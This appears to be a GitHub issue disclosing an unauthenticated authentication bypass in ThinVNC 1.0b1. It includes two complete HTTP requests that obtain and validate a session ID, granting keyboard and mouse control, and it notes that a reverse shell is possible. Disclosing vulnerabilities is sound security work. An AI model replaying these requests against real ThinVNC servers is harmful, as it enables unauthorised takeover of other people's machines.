You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via http://thin-vnc:8080/cmd?cmd=connect by obtaining a valid SID without any kind of authentication. It is possible to achieve code execution on the server by sending keyboard or mouse events to the server.
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score:
10.0
Steps to reproduce
Send a request to the application in order to obtain a valid SID.
GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1Host: 172.16.28.140:8081Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestReferer: http://172.16.28.140:8081/Cookie: SID=
Obtain the SID from the server response and create a new request in order to validate the SID.
GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=[SID] HTTP/1.1Host: 172.16.28.140:8081Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestReferer: http://172.16.28.140:8081/Cookie: SID=[SID]
Now it is possible to send keystrokes or mouse moves to the server using the validated SID
An exploit can be used to obtain a reverse shell on the server running the ThinVNC application.
Screenshots and files
System Information
Version: ThinVNC version 1.0b1.
Operating System: Windows 10.
The text was updated successfully, but these errors were encountered:
Bug description
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via
http://thin-vnc:8080/cmd?cmd=connect
by obtaining a validSID
without any kind of authentication. It is possible to achieve code execution on the server by sending keyboard or mouse events to the server.CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score:
10.0
Steps to reproduce
SID
.SID
from the server response and create a new request in order to validate theSID
.Now it is possible to send keystrokes or mouse moves to the server using the validated
SID
An exploit can be used to obtain a reverse shell on the server running the ThinVNC application.
Screenshots and files
System Information
The text was updated successfully, but these errors were encountered: